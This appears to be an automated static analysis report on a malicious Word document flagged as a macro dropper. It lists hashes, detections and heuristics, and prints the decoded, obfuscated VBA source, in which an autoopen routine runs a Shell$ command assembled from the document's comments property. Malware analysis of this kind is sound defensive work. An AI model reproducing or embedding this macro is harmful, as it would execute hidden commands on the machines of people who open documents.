Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2747932c56b816aa…

MALICIOUS

Office (OLE)

74.0 KB Created: 2017-10-06 21:24:00 Authoring application: Microsoft Office Word First seen: 2017-10-10
MD5: 1a4471c427c7b4d87f3edf0c150e4c89 SHA-1: 3c41291459807bfbe05fe9b7c1c40e6a2ab97cd7 SHA-256: 2747932c56b816aae80ace812975e868b3227ab651903c1dc01e987231cccc96
172 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is a malicious Office document containing VBA macros. A critical heuristic firing indicates a potential Shell call within the VBA code, and legacy WordBasic auto-exec markers were detected. The presence of the 'macros.bas' file and the critical heuristic suggest the macro is designed to execute a command, likely to download and run a secondary payload, aligning with dropper malware behavior.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6340624-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6340624-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell$ "" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + hMxfPTvZXC + Mid(TxxdszysVP, 40) + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + avNBbuUD, 0
    RUtyUCDcc = 72 + 84 + 68 + 80 + 64 + 86 + 68 + 94 + 89 + 92 + 69 + 56 + 97 + 82
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    End Sub
    Sub autoopen()
    avrPreFPA = 100 + 63 + 78 + 90 + 71 + 56 + 68 + 83 + 77 + 70 + 82 + 82 + 62 + 69 + 100 + 73 + 82 + 82 + 96 + 69
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9097 bytes
SHA-256: b638b5c5245aa23762bc5b61b94655eaf41a8fc006ef47c578af98297da2f867
Detection
ClamAV: No threats found
Obfuscation or payload: likely
76 of 99 identifiers look randomly generated (e.g. 'tFFBpbzEVBD') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Function SMUpGxrua()
LfMsXThHP = 92 + 59 + 62 + 89 + 60 + 99 + 99 + 64 + 61 + 67 + 58 + 57 + 100 + 76 + 76 + 66 + 63 + 81 + 83 + 63 + 87
 NbMrrVRfYWR = 73 + 65 + 98 + 71 + 73 + 92 + 63 + 94 + 59 + 89 + 91 + 81 + 64 + 67 + 93 + 57 + 59 + 62
 xkwmzNnXW = 66 + 59 + 57 + 75 + 74 + 93 + 61 + 99 + 64 + 58 + 76 + 63 + 65 + 79 + 89 + 90 + 100 + 98 + 77
 BsBvVKDNDsa = 55 + 86 + 80 + 73 + 79 + 99 + 76 + 98 + 83 + 55 + 93 + 55 + 76
 CDDGGCnFg = 79 + 58 + 78 + 57 + 89 + 70 + 87 + 81 + 78 + 83 + 72 + 82 + 95 + 100 + 84 + 99 + 99 + 95 + 92 + 73 + 96
 UapYHPb = 65 + 95 + 59 + 97 + 89 + 79 + 73 + 71 + 89 + 60 + 98 + 96 + 58 + 84 + 89 + 88 + 55

hMxfPTvZXC = "" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + Mid(TxxdszysVP, 1, 2) + Mid(TxxdszysVP, 11, 4) + Mid(TxxdszysVP, 23, 6) + "e" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + " "
xyySnxUwWh = 75 + 92 + 88 + 97 + 59 + 93 + 64 + 65 + 85 + 59 + 88 + 61 + 95 + 75 + 99 + 56 + 62 + 96 + 92 + 63
 bnPwxmSzTH = 63 + 84 + 83 + 70 + 99 + 74 + 70 + 56 + 75 + 93 + 95 + 77 + 91 + 72 + 89 + 67 + 68 + 77 + 83 + 68 + 72 + 73
 pgkyPdxc = 66 + 62 + 83 + 96 + 98 + 64 + 69 + 85 + 77 + 73 + 76 + 89 + 81 + 78 + 68 + 66 + 58 + 97 + 60 + 82 + 70 + 62
 gRWHnrEt = 72 + 74 + 87 + 80 + 78 + 75 + 100 + 63 + 99 + 56 + 61 + 81 + 55 + 90 + 58
 RfVrhVuA = 77 + 77 + 78 + 67 + 61 + 69 + 90 + 93 + 80 + 76 + 71 + 85 + 80 + 86 + 99 + 80 + 88

Shell$ "" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + hMxfPTvZXC + Mid(TxxdszysVP, 40) + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + avNBbuUD, 0
RUtyUCDcc = 72 + 84 + 68 + 80 + 64 + 86 + 68 + 94 + 89 + 92 + 69 + 56 + 97 + 82
 FMsaKtzT = 82 + 60 + 64 + 77 + 68 + 67 + 65 + 60 + 58 + 87 + 95 + 57 + 94 + 69 + 62 + 77 + 85 + 88 + 99 + 95 + 80 + 57
 AGdDUfwr = 73 + 77 + 78 + 82 + 65 + 68 + 59 + 88 + 62 + 86 + 85 + 64 + 68 + 100 + 100 + 62
 FPhrazsVz = 92 + 57 + 92 + 59 + 61 + 71 + 83 + 63 + 96 + 93 + 100 + 76 + 91 + 95 + 65 + 85 + 64 + 94 + 77 + 72 + 84 + 66
 mMtWDypM = 83 + 89 + 61 + 81 + 55 + 78 + 82 + 59 + 88 + 76 + 60 + 100 + 77 + 67 + 85 + 88 + 63 + 70 + 82 + 81 + 67 + 66

End Function
Function TxxdszysVP()
kELBCRvxK = 98 + 82 + 93 + 80 + 75 + 99 + 96 + 98 + 99 + 59 + 66 + 76 + 99 + 86 + 68 + 97 + 55 + 98 + 88 + 86 + 55 + 82 + 79
 FdpkpHT = 66 + 83 + 96 + 70 + 97 + 68 + 83 + 97 + 99 + 59 + 76 + 55 + 61 + 94 + 56 + 91 + 63 + 71 + 58 + 66 + 76 + 64 + 63 + 78 + 57 + 88
 UbPUYpBKgp = 79 + 78 + 69 + 55 + 73 + 97 + 70 + 75 + 65 + 78 + 92 + 93 + 92 + 71 + 66 + 95 + 90 + 99 + 63 + 78 + 97 + 74
 TsPEutAZ = 69 + 89 + 55 + 86 + 56 + 71 + 96 + 74 + 87 + 74 + 94 + 88 + 59 + 89 + 88 + 97 + 68 + 68 + 95 + 68 + 81 + 67 + 74 + 69 + 61 + 61
 tMFRXUCsufw = 83 + 88 + 86 + 89 + 91 + 63 + 61 + 87 + 92 + 70 + 80 + 62 + 87 + 100 + 57 + 64 + 72 + 74 + 67
 ytcRXpt = 58 + 97 + 86 + 70 + 100 + 87 + 59 + 93 + 77 + 97 + 56 + 73 + 88 + 93 + 59 + 77 + 71 + 75 + 56 + 98 + 99 + 65 + 75 + 64

AKMnVPdkUnv = "" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + "comme" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + "nts" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + cYwdSEuMaLm
PKHEvBdfFNg = 96 + 73 + 95 + 63 + 93 + 60 + 90 + 89 + 58 + 61 + 83 + 86 + 57 + 68 + 71 + 79
 payrRwDY = 71 + 66 + 91 + 74 + 86 + 83 + 69 + 80 + 88 + 92 + 92 + 78 + 92 + 63 + 95 + 86 + 60 + 93 + 78 + 86
 SCtxvMwZHXH = 77 + 98 + 70 + 86 + 86 + 71 + 70 + 60 + 99 + 76 + 57 + 82 + 70 + 61 + 100 + 91 + 89 + 80 + 86 + 91 + 89 + 87 + 93
 aabLxWv = 68 + 61 + 73 + 92 + 99 + 72 + 68 + 88 + 63 + 75 + 80 + 90 + 92 + 96 + 83 + 98 + 68 + 80 + 56 + 79 + 59 + 60 + 64 + 67 + 67
 RxNcSut = 94 + 71 + 96 + 75 + 81 + 62 + 93 + 84 + 97 + 86 + 97 + 87 + 86 + 91 + 72 + 97 + 62 + 90 + 81 + 95 + 72
 DTmLCTawM = 61 + 68 + 72 + 70 + 72 + 94 + 56 + 71 + 69 + 70 + 80 + 93 + 69 + 76 + 96 + 84 + 98 + 71
 TFNMbKCMy = 72 + 78 + 78 + 98 + 72 + 87 + 89 + 83 + 63 + 60 + 99 + 94 + 67 + 99 + 75 + 93 + 76 + 72 + 93 + 95 + 58 + 67 + 87

TxxdszysVP = "" + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + ActiveDocument.BuiltInDocumentProperties(AKMnVPdkUnv) + UFFEwZp + MermscARvf + nPfgGvGuS + mbhvGCD + sLsRpHKWf + cdLxvnfMb + SUmVRRvfGYT + ZrAKfkt + YDupdYb + AekCGcLMDUd + sFCdfCFx + vWCsuwR + XZUsuxuC
FLrMuYmra = 57 + 60 + 74 + 61 + 73 + 76 + 71 + 89 + 61 + 99 + 99 + 78 + 90 + 90 + 61 + 91 + 81
 SnwwedTTXTe = 80 + 93 + 55 + 89 + 64 + 90 + 99 + 70 + 64 + 85 + 62 + 98 + 59 + 78 + 87 + 67 + 80 + 79 + 70
 cNXfbNEa = 84 + 70 + 88 + 57 + 93 + 100 + 84 + 84 + 59 + 83 + 60 + 82 + 83 + 89 + 83 + 93 + 69 + 79
 dsSgEZArZF = 79 + 55 + 83 + 95 + 95 + 83 + 75 + 98 + 71 + 74 + 89 + 66 + 66 + 78 + 69 + 89 + 83 + 66 + 56 + 81 + 81 + 81 + 90 + 68 + 92 + 69 + 76 + 97 + 67 + 87 + 99 + 97
 fTDGbCuF = 95 + 77 + 76 + 99 + 78 + 100 + 56 + 85 + 88 + 56 + 71 + 84 + 75 + 90 + 92 + 59 + 56 + 85 + 97 + 98 + 96 + 65 + 56 + 87 + 83 + 83
 uwSZRfndptx = 72 + 60 + 65 + 70 + 98 + 61 + 79 + 93 + 61 + 56 + 71 + 72 + 68
 mmvcBCyBBzt = 60 + 73 + 73 + 85 + 81 + 57 + 95 + 98 + 98 + 74 + 67 + 68 + 85 + 66 + 95 + 69 + 77

End Function
Sub DyEAfVFbGY()
awVtxsHKD = 99 + 83 + 81 + 67 + 84 + 63 + 92 + 86 + 78 + 95 + 77 + 90 + 83 + 79 + 56 + 95 + 76 + 94 + 57 + 100 + 98 + 55 + 98 + 91 + 80 + 76
 CdMUTGvdZA = 91 + 70 + 86 + 69 + 64 + 84 + 55 + 77 + 95 + 85 + 68 + 83 + 93 + 60 + 87 + 87 + 90 + 85 + 84 + 60 + 95 + 71
 zFpNNCLkUN = 91 + 92 + 89 + 81 + 71 + 82 + 69 + 63 + 68 + 94 + 80 + 64 + 56 + 85 + 86 + 80 + 64 + 72 + 86 + 79
 fesdZwvFv = 61 + 56 + 97 + 93 + 93 + 80 + 97 + 84 + 89 + 91 + 82 + 100 + 88 + 55 + 100 + 84 + 59 + 71 + 97 + 77 + 83
 uPGcDGvc = 67 + 80 + 94 + 55 + 55 + 68 + 92 + 58 + 70 + 73 + 90 + 55 + 92 + 71 + 56 + 98 + 99 + 69 + 67 + 78 + 75
 yTWGrtDcV = 86 + 73 + 81 + 69 + 82 + 75 + 88 + 65 + 87 + 74 + 59 + 76 + 82 + 84 + 71 + 89

SMUpGxrua
TsbVezpFSNr = 60 + 91 + 86 + 97 + 65 + 64 + 63 + 89 + 62 + 94 + 71 + 62 + 99
 XaXbzbhtAt = 86 + 58 + 81 + 58 + 63 + 69 + 56 + 85 + 87 + 80 + 92 + 92 + 67 + 70 + 74 + 74 + 62 + 61
 LzHDDZvS = 98 + 88 + 62 + 57 + 80 + 63 + 86 + 96 + 60 + 80 + 65 + 58 + 59 + 81 + 86 + 67 + 82 + 63 + 90 + 58
 mMEFwvcUTBk = 62 + 85 + 55 + 84 + 71 + 79 + 82 + 73 + 72 + 94 + 87 + 61 + 72 + 86 + 86 + 83 + 84 + 90 + 81 + 70 + 68 + 60 + 96 + 60 + 77 + 79 + 56
 mxhmNKASgr = 99 + 100 + 88 + 78 + 55 + 74 + 86 + 61 + 72 + 96 + 91 + 87 + 79 + 68 + 75 + 85 + 59 + 64 + 77
 VKhhVxYwDss = 63 + 72 + 100 + 78 + 73 + 79 + 60 + 90 + 92 + 90 + 92 + 78 + 88 + 94 + 83 + 99 + 83 + 91 + 85 + 56 + 64 + 85 + 66 + 69 + 100 + 98
 uLypGEaw = 100 + 58 + 77 + 97 + 79 + 92 + 85 + 99 + 99 + 91 + 75 + 82 + 98 + 85 + 93 + 98

End Sub
Sub autoopen()
avrPreFPA = 100 + 63 + 78 + 90 + 71 + 56 + 68 + 83 + 77 + 70 + 82 + 82 + 62 + 69 + 100 + 73 + 82 + 82 + 96 + 69
 XsdndfxXk = 88 + 66 + 64 + 93 + 65 + 72 + 59 + 77 + 83 + 61 + 92 + 73 + 78 + 63 + 96 + 82 + 72
 epHeyVxU = 78 + 63 + 71 + 79 + 56 + 62 + 85 + 63 + 77 + 76 + 74 + 64 + 95 + 62 + 98 + 57 + 68 + 81
 tzyGYTAbft = 69 + 84 + 83 + 96 + 58 + 97 + 55 + 77 + 58 + 55 + 75 + 84 + 82 + 92 + 68 + 57 + 93 + 85 + 95 + 95 + 59
 ynpsKeY = 60 + 65 + 89 + 78 + 87 + 86 + 95 + 68 + 76 + 62 + 67 + 69 + 91 + 99 + 98 + 80 + 76 + 82 + 67 + 85 + 94 + 79 + 68 + 65 + 95
 HrgnxUf = 61 + 63 + 65 + 74 + 73 + 64 + 98 + 63 + 88 + 64 + 60 + 66 + 83 + 86 + 59 + 88 + 58 + 79

DyEAfVFbGY
tFFBpbzEVBD = 95 + 85 + 64 + 83 + 63 + 82 + 81 + 91 + 86 + 62 + 87 + 82 + 72 + 98 + 84 + 82 + 67 + 80 + 74 + 87 + 92 + 83 + 92 + 59 + 90 + 79 + 79
 wWxbdvzHZu = 84 + 64 + 97 + 72 + 75 + 62 + 88 + 96 + 73 + 69 + 100 + 69 + 76 + 76 + 77 + 98 + 72 + 73 + 84 + 96 + 81 + 97 + 97 + 89
 UwkSNDsM = 94 + 74 + 67 + 78 + 65 + 60 + 60 + 84 + 88 + 60 + 59 + 64 + 89 + 91 + 69 + 80 + 66
 rBfuFxXEn = 100 + 80 + 91 + 62 + 89 + 90 + 92 + 98 + 62 + 66 + 70 + 66 + 95 + 58 + 71 + 78 + 55 + 62
 ZNZYbtVGX = 65 + 65 + 73 + 90 + 88 + 56 + 88 + 65 + 77 + 97 + 79 + 80 + 66 + 65 + 81 + 75 + 100 + 100 + 91 + 57 + 75 + 88 + 82 + 60 + 73
 NDwLRskNRm = 99 + 68 + 74 + 95 + 60 + 56 + 96 + 79 + 70 + 70 + 56 + 79 + 95 + 61 + 88 + 83 + 63
 VCLfrCtNZC = 79 + 62 + 59 + 99 + 74 + 87 + 56 + 68 + 87 + 81 + 69 + 55 + 89 + 91 + 95 + 75 + 94 + 61 + 59 + 66

End Sub